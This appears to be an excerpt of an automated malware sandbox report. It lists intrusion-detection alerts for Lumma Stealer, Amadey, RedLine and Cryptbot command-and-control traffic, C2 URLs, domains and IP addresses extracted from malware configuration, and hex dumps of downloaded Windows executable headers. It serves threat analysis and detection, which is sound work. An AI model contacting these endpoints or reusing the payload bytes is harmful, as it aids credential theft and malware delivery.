Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.8:63692 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49794 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49793 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49801 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49803 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49805 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49809 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49816 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49816 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.8:49816
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49817 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055490 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) : 192.168.2.8:49822 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49826 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49825 -> 195.133.13.230:80
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49830 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49834 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.8:49816
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49839 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055490 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop) : 192.168.2.8:49851 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.8:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.8:49845 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49801 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49830 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49830 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49822 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49801 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49822 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49851 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49851 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49788 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49788 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49794 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49794 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.26
Source: Malware configuration extractor	URLs: thirtv13vt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: 95.179.250.45:26212

Source: global traffic	TCP traffic: 192.168.2.8:49714 -> 95.179.250.45:26212
Source: global traffic	TCP traffic: 192.168.2.8:49722 -> 65.21.18.51:45580

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:07 GMTContent-Type: application/octet-streamContent-Length: 1104936Last-Modified: Mon, 19 Aug 2024 12:56:48 GMTConnection: keep-aliveETag: "66c34110-10dc28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 aa 10 00 00 20 00 00 00 ac 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 05 00 00 00 e0 10 00 00 06 00 00 00 ae 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 11 00 00 02 00 00 00 b4 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ca 10 00 00 00 00 00 48 00 00 00 02 00 05 00 90 b9 10 00 04 0f 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 0d ac 93 4c e6 76 fa 6c 54 10 70 23 8b 45 05 b2 27 26 c8 c4 40 63 43 04 ce d8 74 45 d1 ab 91 c8 04 c9 25 20 0b eb 83 e8 84 70 72 2a 51 41 b8 55 ea 76 36 0f d5 56 c6 3d 18 43 78 96 1c 47 15 48 f2 45 8b cf 1b b3 de 69 85 85 82 04 c7 a1 28 68 68 c6 71 c4 82 42 66 0c c0 7d c6 b9 05 a5 67 4c 2d 17 53 a8 31 29 2c 70 98 e0 aa c4 d7 e7 ae b6 24 94 38 f0 69 6a 33 0e 1b b9 fb e0 37 d3 b3 fc ab 07 21 54 73 8c c9 9f df cf ec 18 54 a7 5b 89 c7 0a 58 aa b0 50 55 45 a5 63 d0 b8 6a 0a 1e c5 b5 73 ca be 5d 1c 45 fc f5 9b 1d f7 00 94 00 71 fb 58 80 77 73 53 c7 59 bb 8e ad ae 67 29 fa d9 e7 1a f3 9c f5 37 49 aa fe ee 4f 4b af 09 6d 28 13 86 64 1f 28 bd 54 ca de cb b3 81 b4 13 07 1b 30 60 c0 56 60 01 b3 00 6f bb b4 9a dd ac 45 17 47 9e ca 0e 23 05 49 09 f0 71 13 a0 14 ed c2 6c 68 39 9c f1 2b d5 fb 00 e4 ba 12 8b 08 9a 3e 36 51 8b e1 3d d8 53 20 d3 f4 14 b3 c3 ed 05 ad c0 b5 b1 2d 89 f5 dc ff 23 d5 d2 5d 90 01 c3 02 14 88 0e 72 41 cb 52 1e 9e 8b 0d 90
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:11 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:14 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
